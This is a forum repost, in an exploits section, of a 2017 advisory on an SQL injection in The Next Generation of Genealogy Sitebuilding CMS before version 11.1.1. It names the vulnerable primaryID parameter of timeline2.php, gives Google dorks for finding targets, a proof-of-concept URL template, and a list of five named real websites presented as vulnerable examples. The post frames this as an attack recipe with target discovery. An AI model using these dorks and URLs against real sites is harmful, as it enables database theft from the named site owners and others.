Jump to content
Fi8sVrs

The Next Generation Of Genealogy Sitebuilding SQL Injection

By Fi8sVrs, in Exploituri

Recommended Posts

  • Active Members
Fi8sVrs Rookie

Fi8sVrs

Posted
  • Active Members
Posted

The Next Generation of Genealogy Sitebuilding versions prior to 11.1.1 suffer from a remote SQL injection vulnerability.

  

========================================================================================== 
 The Next Generation of Genealogy Sitebuilding SQL Injection Vulnerability 
========================================================================================== 

:-------------------------------------------------------------------------------------------------------------------------: 
: # Exploit Title : The Next Generation of Genealogy Sitebuilding SQL Injection Vulnerability  
: # Date : 29th August 2017  
: # Author : X-Cisadane 
: # CMS Name :  The Next Generation of Genealogy Sitebuilding 
: # Version : < 11.1.1
: # CMS Developer : http://www.tngsitebuilding.com/
: # Category : Web Application 
: # Vulnerability : SQL Injection 
: # Tested On : SQLMap 1.1.8.16#dev (Windows 7 64-bit) 
: # Greetz to : X-Code YogyaFree, ExploreCrew, CodeNesia, Bogor Hackers Community, Borneo Crew, Depok Cyber, Mantan 
:-------------------------------------------------------------------------------------------------------------------------: 

A SQL Injection Vulnerability has been discovered in the The Next Generation of Genealogy Sitebuilding CMS.
The vulnerability allows remote attackers to execute own SQL Commands by usage of a vulnerable serivce value. 
The vulnerability is located in the primaryID value of the timeline2.php file. 
Remote attackers are able to execute own SQL Commands by usage of a GET method request with manipulated primaryID value. 
Remote attackers are able to read database information by execution of own SQL Commands. 
  
DORKS (How to find the target) : 
================================  
inurl:/timeline2.php?primaryID= 
Or "powered by The Next Generation of Genealogy Sitebuilding" 
Or use your own Google Dorks :) 

Proof of Concept  
================  

SQL Injection 
PoC :  
http://[Site]/[Path]/timeline2.php?primaryID=['SQLi]  

Screenshot (PoC) : 
https://s20.postimg.org/asdu29rwt/Screenshot_99.png 
https://s20.postimg.org/wsu6iwakt/Screenshot_100.png 

Example of Vuln Sites : 
http://1820settlers.co.uk/genealogy/timeline2.php?primaryID=['SQLi] 
http://lythgoes.net/genealogy/timeline2.php?primaryID=['SQLi] 
http://henrygrowfamily.org/timeline2.php?primaryID=['SQLi] 
http://www.ennever.com/timeline2.php?primaryID=['SQLi] 
http://mcbridehistory.com/timeline2.php?primaryID=['SQLi] 

... etc ...

Source: https://packetstormsecurity.com/files/143954/The-Next-Generation-Of-Genealogy-Sitebuilding-SQL-Injection.html

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...